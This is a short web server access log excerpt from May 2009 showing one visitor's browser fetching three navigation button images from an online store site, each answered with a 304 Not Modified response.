85.105.85.50 - - [12/May/2009:03:21:44 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD54889D04800A47C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:21:45 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD54889D04800A47C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:21:45 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD54889D04800A47C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
